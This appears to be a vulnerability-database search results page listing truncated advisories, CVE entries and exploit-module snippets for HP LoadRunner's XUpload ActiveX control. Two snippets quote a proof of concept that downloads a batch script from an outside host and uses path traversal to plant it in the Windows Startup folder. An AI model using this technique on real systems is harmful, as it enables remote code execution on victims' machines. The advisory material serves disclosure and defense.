316 matches found
HP Mercury Multiple Products Agent Command Processing Buffer Overflow (CVE-2007-0446)
HP Mercury LoadRunner is a performance and load testing product. LoadRunner consists of three components, a Virtual User Generator, a Controller, and an Analysis module. The Virtual User Generator constructs large number of virtual user clients and generate running script. The Controller runs the...
HP LoadRunner 9.0 ActiveX Buffer Overflow
$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'HP LoadRunne...
Persits XUpload ActiveX AddFile Buffer Overflow
This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX controlversion 3.0.0.3 thats included in HP LoadRunner 9.5. By passing an overly long string to the AddFile method, an attacker may be able to execute arbitrary code. This module requires Metasploit:...
HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX controlversion 2.1.0.1 thats included in HP LoadRunner 9.0. By passing an overly long string to the AddFolder method, an attacker may be able to execute arbitrary code. This module requires Metasploit:...
HP LoadRunner XUpload ActiveX control MakeHttpRequest file download
Added: 10/21/2009 CVE: CVE-2009-3693 BID: 36550 Background HP LoadRunner is a software performance testing solution. HP LoadRunner includes the XUpload.ocx ActiveX control for performing file exchanges. Problem The MakeHttpRequest method in the XUpload.ocx ActiveX control can be used to download...
HP LoadRunner XUpload ActiveX control MakeHttpRequest file download
Added: 10/21/2009 CVE: CVE-2009-3693 BID: 36550 Background HP LoadRunner is a software performance testing solution. HP LoadRunner includes the XUpload.ocx ActiveX control for performing file exchanges. Problem The MakeHttpRequest method in the XUpload.ocx ActiveX control can be used to download...
HP LoadRunner XUpload ActiveX control MakeHttpRequest file download
Added: 10/21/2009 CVE: CVE-2009-3693 BID: 36550 Background HP LoadRunner is a software performance testing solution. HP LoadRunner includes the XUpload.ocx ActiveX control for performing file exchanges. Problem The MakeHttpRequest method in the XUpload.ocx ActiveX control can be used to download...
HP LoadRunner XUpload ActiveX control MakeHttpRequest file download
Added: 10/21/2009 CVE: CVE-2009-3693 BID: 36550 Background HP LoadRunner is a software performance testing solution. HP LoadRunner includes the XUpload.ocx ActiveX control for performing file exchanges. Problem The MakeHttpRequest method in the XUpload.ocx ActiveX control can be used to download...
CVE-2009-3693
Directory traversal vulnerability in the Persits.XUpload.2 ActiveX control XUpload.ocx in HP LoadRunner 9.5 allows remote attackers to create arbitrary files via .. backwards slash dot dot sequences in the third argument to the MakeHttpRequest method...
DSquare Exploit Pack: D2SEC_XUPLOAD2
Name| d2secxupload2 ---|--- CVE| CVE-2009-3693 Exploit Pack| D2ExploitPack Description| HP LoadRunner XUpload.ocx ActiveX Arbitrary File Download Vulnerability Notes|...
Directory traversal
Directory traversal vulnerability in the Persits.XUpload.2 ActiveX control XUpload.ocx in HP LoadRunner 9.5 allows remote attackers to create arbitrary files via .. backwards slash dot dot sequences in the third argument to the MakeHttpRequest method...
CVE-2009-3693
Directory traversal vulnerability in the Persits.XUpload.2 ActiveX control XUpload.ocx in HP LoadRunner 9.5 allows remote attackers to create arbitrary files via .. backwards slash dot dot sequences in the third argument to the MakeHttpRequest method...
CVE-2009-3693
CVE-2009-3693 involves a directory traversal in Persits.XUpload.2 ActiveX control (XUpload.ocx) shipped with HP LoadRunner 9.5. The flaw arises in the MakeHttpRequest method, where sequences like "..\" can cause arbitrary files to be created on the target. Public details describe this as a write-...
HP LoadRunner 9.5 remote file creation PoC
Exploit for unknown platform in category dos / poc ========================================== HP LoadRunner 9.5 remote file creation PoC ========================================== Title: HP LoadRunner 9.5 remote file creation PoC CVE-ID: OSVDB-ID: Author: Pyrokinesis Published: 2009-09-29 Verifie...
HP LoadRunner 9.5 remote file creation PoC
No description provided by source. !-- HP LoadRunner 9.5 Persits.XUpload.2 control XUpload.ocx MakeHttpRequest remote file creation poc IE 8 by Nine:Situations:Group::pyrokinesis CLSID: E87F6C8E-16C0-11D3-BEF7-009027438003 Progid: Persits.XUpload.2 Binary Path:...
HP LoadRunner 9.5 - Remote file creation (PoC)
' http://retrogod.altervista.org/sh9232.txt , a batch script that starts calc.exe XUPLOADLib.Server = "retrogod.altervista.org" XUPLOADLib.Script = "sh9232.txt" ' place it in the Startup folder, italian path, change for your os Method="" Params="" Path="..\..\..\Documents and Settings\All...
HP LoadRunner 9.5 File Creation
' http://retrogod.altervista.org/sh9232.txt , a batch script that starts calc.exe XUPLOADLib.Server = "retrogod.altervista.org" XUPLOADLib.Script = "sh9232.txt" ' place it in the Startup folder, italian path, change for your os Method="" Params="" Path="..\..\..\Documents and Settings\All...
XUpload ActiveX Control AddFolder Method Buffer Overflow
The remote host contains a version of the XUpload ActiveX control from Persits Software that reportedly is affected by a buffer overflow in its 'AddFolder' method that can be triggered by a long argument. If a remote attacker can trick a user on the affected host into visiting a specially crafted...
CVE-2007-6530
Buffer overflow in the XUpload.ocx ActiveX control in Persits Software XUpload 2.1.0.1, and probably other versions before 3.0, as used by HP Mercury LoadRunner and Groove Virtual Office, allows remote attackers to execute arbitrary code via a long argument to the AddFolder function...
CVE-2007-6530
Buffer overflow in the XUpload.ocx ActiveX control in Persits Software XUpload 2.1.0.1, and probably other versions before 3.0, as used by HP Mercury LoadRunner and Groove Virtual Office, allows remote attackers to execute arbitrary code via a long argument to the AddFolder function...